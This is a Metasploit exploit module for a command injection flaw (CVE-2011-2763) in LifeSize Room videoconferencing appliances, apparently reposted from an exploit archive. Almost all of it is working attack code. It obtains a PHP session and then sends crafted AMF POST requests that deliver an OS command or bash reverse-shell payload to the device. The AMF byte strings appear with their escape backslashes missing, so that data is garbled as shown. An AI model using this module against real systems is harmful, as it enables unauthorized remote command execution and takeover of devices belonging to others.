LifeSize Room Command Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : LifeSize Room Command Injection
# Published : 2011-11-02
# Author :
# Previous Title : Gitorious Arbitrary Command Execution
# Next Title : Apple Safari file:// Arbitrary Code Execution
##
# $Id: lifesize_room.rb 14143 2011-11-02 19:40:05Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'LifeSize Room Command Injection',
			'Description'    => %q{
					This module exploits a vulnerable resource in LifeSize
				Room  versions 3.5.3 and 4.7.18 to inject OS commmands.  LifeSize
				Room is an appliance and thus the environment is limited
				resulting in a small set of payload options.
			},
			'Author'	=> 
				[
					# SecureState R&D Team - Special Thanks To Chris Murrey
					'Spencer McIntyre',
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 14143 $',
			'References'     =>
				[
					[ 'CVE', '2011-2763' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 65535,	# limited by the two byte size in the AMF encoding
					'Compat'      =>
						{
							'PayloadType' => 'cmd cmd_bash',
							'RequiredCmd' => 'generic bash-tcp',
						}
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [ [ 'Automatic', { } ] ],
			'DisclosureDate' => 'Jul 13 2011',
			'DefaultTarget'  => 0))
	end

	def exploit
		print_status("Requesting PHP Session...")
		res = send_request_cgi({
			'encode'    => false,
			'uri'       => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
			'method'    => 'GET',
		}, 10)

		if not res.headers['set-cookie']
			print_error('Could Not Obtain A Session ID')
			return
		end

		sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]

		headers = {
			'Cookie'        => sessionid,
			'Content-Type'  => 'application/x-amf',
		}

		print_status("Validating PHP Session...")

		data  = "x00x00x00x00x00x02x00x1b"
		data << "LSRoom_Remoting.amfphpLogin"
		data << "x00x02/1x00x00x00"
		data << "x05x0ax00x00x00x00x00x17"
		data << "LSRoom_Remoting.getHost"
		data << "x00x02x2fx32x00x00x00x05x0ax00x00x00x00"

		res = send_request_cgi({
				'encode'    => false,
				'uri'       => '/gateway.php',
				'data'      => data,
				'method'    => 'POST',
				'headers'   => headers,
		}, 10)

		if not res
			print_error('Could Not Validate The Session ID')
			return
		end

		print_status("Sending Malicious POST Request...")

		# This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
		amf_data =  "x00x00x00x00x00x01x00x19"
		amf_data << "LSRoom_Remoting.doCommand"
		amf_data << "x00x02x2fx37xffxffxffxff"
		amf_data << "x0ax00x00x00x02x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
		amf_data << "x02x00x0dupgradeStatus"

		res = send_request_cgi({
				'encode'    => false,
				'uri'       => '/gateway.php?' << sessionid,
				'data'      => amf_data,
				'method'    => 'POST',
				'headers'   => headers
		}, 10)
	end

end